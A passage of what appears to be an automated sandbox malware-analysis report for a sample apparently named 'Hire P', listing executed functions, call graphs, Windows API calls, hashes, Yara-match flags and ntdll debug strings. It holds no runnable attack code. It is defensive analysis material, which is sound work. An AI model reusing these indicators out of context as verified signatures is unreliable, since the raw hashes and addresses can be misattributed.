11035c0 LdrInitializeThunk 87337->87340 87338 41b0ad 87338->87335 87340->87338 87342 41863d 87341->87342 87348 418b4b 87342->87348 87349 413ca3 87342->87349 87344 41876a 87345 42e743 RtlFreeHeap 87344->87345 87344->87348 87346 418782 87345->87346 87347 42c9e3 ExitProcess 87346->87347 87346->87348 87347->87348 87348->87302 87353 413cc3 87349->87353 87351 413d2c 87351->87344 87352 413d22 87352->87344 87353->87351 87354 41b3e3 RtlFreeHeap LdrInitializeThunk 87353->87354 87354->87352 87355 418d68 87356 42c633 NtClose 87355->87356 87357 418d72 87356->87357

                                                            Executed Functions

                                                            Function 00417793 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 91 417793-4177af 92 4177b7-4177bc 91->92 93 4177b2 call 42f323 91->93 94 4177c2-4177d0 call 42f923 92->94 95 4177be-4177c1 92->95 93->92 98 4177e0-4177f1 call 42dd83 94->98 99 4177d2-4177dd call 42fbc3 94->99 104 4177f3-417807 LdrLoadDll 98->104 105 41780a-41780d 98->105 99->98 104->105
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417805
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                            • Instruction ID: 8c201cb86210103d8ff0389f06be1b6184587a7a4bbc6cbf00069c90d1d8dc7c
                                                            • Opcode Fuzzy Hash: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                            • Instruction Fuzzy Hash: F3015EB5E0020DBBDB10DAE1DC42FDEB7789B14308F4041AAE91897280FA34EB488B95
                                                            Function 0042C633 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 121 42c633-42c66c call 4047d3 call 42d873 NtClose
                                                            APIs
                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C667
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                            • Instruction ID: c58c7d579e4e2bacd6c01519c7e0221e1a66a8a060063ee453bb1f2e55cecb1d
                                                            • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                            • Instruction Fuzzy Hash: 67E0D632600204BBE220AA5AEC02F8BB3ACCBC5714F00401AFA0CA7242C270B91086F5
                                                            Function 01102B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                            • Instruction ID: 380b514f1b228bc081d75c17ae9254c2119d2321acb5c64e8da0945d2a3bd4e4
                                                            • Opcode Fuzzy Hash: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                            • Instruction Fuzzy Hash: 9B90026224240003410971585514616900A97E1201B55C031E1015590DC72589916225
                                                            Function 01102DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                            • Instruction ID: 39b11356add0c70f76e2829180d6813ab33b9a01751b46f48a692bb2d15c2d5c
                                                            • Opcode Fuzzy Hash: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                            • Instruction Fuzzy Hash: 1390023224140413D11571585604707500997D1241F95C422A0425558DD7568A52A221
                                                            Function 01102C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                            • Instruction ID: 909fc2b4ca3a4550b39ab19aeeb864a5ab6787f159b2023eaaf7fb7357fa332a
                                                            • Opcode Fuzzy Hash: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                            • Instruction Fuzzy Hash: B390023224148803D1147158950474A500597D1301F59C421A4425658DC79589917221
                                                            Function 011035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                            • Instruction ID: 55df88d00419f574049992b3107e915872bca788882001add47234a10ace856d
                                                            • Opcode Fuzzy Hash: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                            • Instruction Fuzzy Hash: 5390023264550403D10471585614706600597D1201F65C421A0425568DC7958A5166A2
                                                            Function 00413FBB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 0041409A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 0349A-n$0349A-n
                                                            • API String ID: 1836367815-3456940251
                                                            • Opcode ID: 6713828af27b9a14103d79dc9fc153ece541dbdb8ee11a634a09a0ce15b46ceb
                                                            • Instruction ID: 874110b21b3390a429e1172821fe310f6061561dc3fbdce207ccc568e88ba2fc
                                                            • Opcode Fuzzy Hash: 6713828af27b9a14103d79dc9fc153ece541dbdb8ee11a634a09a0ce15b46ceb
                                                            • Instruction Fuzzy Hash: 06115972E002587BDB119AE28C41DEFBB7DAF81358F04805AF90467241D2784E4747A5
                                                            Function 00414023 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 0041409A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 0349A-n$0349A-n
                                                            • API String ID: 1836367815-3456940251
                                                            • Opcode ID: a67216cafba27e371a777059a0c701bbd68fdb8531e596d5aeb488d9f34b04ad
                                                            • Instruction ID: c1e20e2142e366b389da3563046297cec7b91a3900e043a758beaaf28deb081d
                                                            • Opcode Fuzzy Hash: a67216cafba27e371a777059a0c701bbd68fdb8531e596d5aeb488d9f34b04ad
                                                            • Instruction Fuzzy Hash: 0A01DB71E0021C7AEB10ABD19C81DEF7B7CEF81798F448069FA0467141D6785E0647A5
                                                            Function 00413FDF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 30 413fdf-413feb 30->30 31 413fed-413ff0 30->31 32 414053-414055 31->32 33 413ff2-413ffc 31->33 34 41405b-41408d call 404743 call 424e93 32->34 35 414056 call 417793 32->35 33->32 40 4140ad-4140b3 34->40 41 41408f-41409e PostThreadMessageW 34->41 35->34 41->40 42 4140a0-4140aa 41->42 42->40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0349A-n$0349A-n
                                                            • API String ID: 0-3456940251
                                                            • Opcode ID: 47d999306225662355c300520733858812152cc495b1a1c6fad14eda91b693b9
                                                            • Instruction ID: bd3507925f1ca423312bb13a029e2d8f4e8582ed727c1f867d54eba86e7c9970
                                                            • Opcode Fuzzy Hash: 47d999306225662355c300520733858812152cc495b1a1c6fad14eda91b693b9
                                                            • Instruction Fuzzy Hash: 0A0147B6A01249BEDB105BA24C81CEF7B7DDED2758B048066F904E7241D6784E4647BA
                                                            Function 0042C993 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 43 42c993-42c9d4 call 4047d3 call 42d873 RtlFreeHeap
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C9CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID: =eA
                                                            • API String ID: 3298025750-3399696693
                                                            • Opcode ID: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                            • Instruction ID: 5bf54a144608e309584a604ebbd06080e81bb27e9496a35fdb293cb900648e28
                                                            • Opcode Fuzzy Hash: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                            • Instruction Fuzzy Hash: EDE065B66143047BD610EE9AEC45FAB33ACEFC9750F00441AFA19A7242D770BD118BB9
                                                            Function 0042C943 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 116 42c943-42c984 call 4047d3 call 42d873 RtlAllocateHeap
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,0041E57E,?,?,00000000,?,0041E57E,?,?,?), ref: 0042C97F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                            • Instruction ID: 6c94c9b0a68df69252c11d37fe3a6ed2ea0c874f6190d84ced6cb7a8f7b23c15
                                                            • Opcode Fuzzy Hash: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                            • Instruction Fuzzy Hash: 6EE06DB16042047BD610EE59DC81F9B37ADEFC5714F004019FA1CA7241C674B9108AB9
                                                            Function 00417786 Relevance: 1.5, APIs: 1, Instructions: 29libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 106 417786-4177d0 108 4177e0-4177f1 call 42dd83 106->108 109 4177d2-4177dd call 42fbc3 106->109 114 4177f3-417807 LdrLoadDll 108->114 115 41780a-41780d 108->115 109->108 114->115
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417805
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                            • Instruction ID: 5e67de2430df7b926fa19ab7142ee4ef2541c361e8587618277fac3dc212a9f4
                                                            • Opcode Fuzzy Hash: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                            • Instruction Fuzzy Hash: D8F0A7B5E04109ABCB11DBD0DC52FEEB7749F04304F108297F5189A280F535EB45CB55
                                                            Function 0042C9E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 126 42c9e3-42ca1c call 4047d3 call 42d873 ExitProcess
                                                            APIs
                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,089F3F9E,?,?,089F3F9E), ref: 0042CA17
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: fdc901fa64855fd1b6121672eb0d8bf45718e0c92ca995efb245744b1db379a0
                                                            • Instruction ID: 275eb0913eeab179cd74e56bdad212bd26511b8cc7a058f77c00c70800628c04
                                                            • Opcode Fuzzy Hash: fdc901fa64855fd1b6121672eb0d8bf45718e0c92ca995efb245744b1db379a0
                                                            • Instruction Fuzzy Hash: 6FE046766102147BD220BA9ADC41FDBB7ACDBC9754F00445AFA18A7242C7B0B91086EA
                                                            Function 01102C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 131 1102c0a-1102c0f 132 1102c11-1102c18 131->132 133 1102c1f-1102c26 LdrInitializeThunk 131->133
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                                            • Instruction ID: 667783eb17faf009446a6db66f3c8b2c6db4a6e8c89cde7a9fb29c8e752d30ae
                                                            • Opcode Fuzzy Hash: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                                            • Instruction Fuzzy Hash: 7BB09B72D415C5C6DA16E764570C717790077D1701F25C075D2030685F8778C1D1E275

                                                            Non-executed Functions

                                                            Function 01178D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            • This failed because of error %Ix., xrefs: 01178EF6
                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01178DA3
                                                            • an invalid address, %p, xrefs: 01178F7F
                                                            • a NULL pointer, xrefs: 01178F90
                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01178DB5
                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01178D8C
                                                            • <unknown>, xrefs: 01178D2E, 01178D81, 01178E00, 01178E49, 01178EC7, 01178F3E
                                                            • The resource is owned exclusively by thread %p, xrefs: 01178E24
                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E86
                                                            • The resource is owned shared by %d threads, xrefs: 01178E2E
                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 01178E02
                                                            • *** enter .cxr %p for the context, xrefs: 01178FBD
                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01178DC4
                                                            • *** then kb to get the faulting stack, xrefs: 01178FCC
                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01178DD3
                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 01178F3F
                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E3F
                                                            • The critical section is owned by thread %p., xrefs: 01178E69
                                                            • *** enter .exr %p for the exception record, xrefs: 01178FA1
                                                            • *** Inpage error in %ws:%s, xrefs: 01178EC8
                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01178F34
                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01178F2D
                                                            • The instruction at %p tried to %s , xrefs: 01178F66
                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01178FEF
                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01178F26
                                                            • Go determine why that thread has not released the critical section., xrefs: 01178E75
                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01178E4B
                                                            • write to, xrefs: 01178F56
                                                            • The instruction at %p referenced memory at %p., xrefs: 01178EE2
                                                            • read from, xrefs: 01178F5D, 01178F62
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                            • API String ID: 0-108210295
                                                            • Opcode ID: 7e714f7635efd3b1325f3b78597071bcfb961652dd14c2e8f19f89afdf17b6bb
                                                            • Instruction ID: e73718836fe4afcd2c349f782018b60d690a9e2c6e36126d81b7a5bb78b1292e
                                                            • Opcode Fuzzy Hash: 7e714f7635efd3b1325f3b78597071bcfb961652dd14c2e8f19f89afdf17b6bb
                                                            • Instruction Fuzzy Hash: 9B81E479B40215BFDB2EAA19DC89DAB3F35EF56B54F010048F248AF352E7718912C762
                                                            Function 01142349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2160512332
                                                            • Opcode ID: f46e99cf4fdf0eb45a3bb949723dfab489fe2a0faeedccf5df6fc5c066d87870
                                                            • Instruction ID: 72d9557832db58db8c063178876e12c19de97fd84b5f83d3155cb4c81a1a36cd
                                                            • Opcode Fuzzy Hash: f46e99cf4fdf0eb45a3bb949723dfab489fe2a0faeedccf5df6fc5c066d87870
                                                            • Instruction Fuzzy Hash: 17928E71604742AFE729DF19D880FABB7E8BB84B54F04492DFA94D7250D770E884CB92
                                                            Function 010F8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01135543
                                                            • corrupted critical section, xrefs: 011354C2
                                                            • undeleted critical section in freed memory, xrefs: 0113542B
                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0113540A, 01135496, 01135519
                                                            • Critical section debug info address, xrefs: 0113541F, 0113552E
                                                            • Thread identifier, xrefs: 0113553A
                                                            • Address of the debug info found in the active list., xrefs: 011354AE, 011354FA
                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354CE
                                                            • Critical section address., xrefs: 01135502
                                                            • 8, xrefs: 011352E3
                                                            • Invalid debug info address of this critical section, xrefs: 011354B6
                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354E2
                                                            • Critical section address, xrefs: 01135425, 011354BC, 01135534
                                                            • double initialized or corrupted critical section, xrefs: 01135508
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                            • API String ID: 0-2368682639
                                                            • Opcode ID: 3704cc0e0f053906e1c6310aacda72b423739f73d2cc0a74b32c0a8a098664da
                                                            • Instruction ID: 62c780c157bc2cef7bcd422742a23cd9fac389810e31fe87a28dc7282ad97876
                                                            • Opcode Fuzzy Hash: 3704cc0e0f053906e1c6310aacda72b423739f73d2cc0a74b32c0a8a098664da
                                                            • Instruction Fuzzy Hash: 58819EB1A40349EFDB68CF99C845BEEBBB6BB48B14F50811AF544BB680D375A940CB50
                                                            Function 010F29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011325EB
                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01132409
                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01132602
                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0113261F
                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01132506
                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01132412
                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01132624
                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011324C0
                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011322E4
                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01132498
                                                            • @, xrefs: 0113259B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                            • API String ID: 0-4009184096
                                                            • Opcode ID: e47a2acc3578bd04b982fec5c10c3440b375a937bfd3acdd094cfb11aa024038
                                                            • Instruction ID: 9e3c4d930c0cbc607cb50ece130f3309cebea4ca5aa2bf45f229dd87b93b8807
                                                            • Opcode Fuzzy Hash: e47a2acc3578bd04b982fec5c10c3440b375a937bfd3acdd094cfb11aa024038
                                                            • Instruction Fuzzy Hash: 85027EF1D002299BDB25DB54CC81BDEB7B8AF44704F4041EAE749A7241EB70AE84CF99
                                                            Function 01168B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                            • API String ID: 0-2515994595
                                                            • Opcode ID: a4687c0f75ef6c8f467e1b9b4600ea16e736d6cce6b8afbeadf196d828a24795
                                                            • Instruction ID: 85e1424fc571a3fbf4b00e5df0cd0a9d7d61af5d3f339bdd0a73e5aa3d1d5929
                                                            • Opcode Fuzzy Hash: a4687c0f75ef6c8f467e1b9b4600ea16e736d6cce6b8afbeadf196d828a24795
                                                            • Instruction Fuzzy Hash: EC51EF715143019BC72DDF18C844BABBBECFFA8244F14491DEA98C7284E7B1D618CBA2
                                                            Function 010DAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
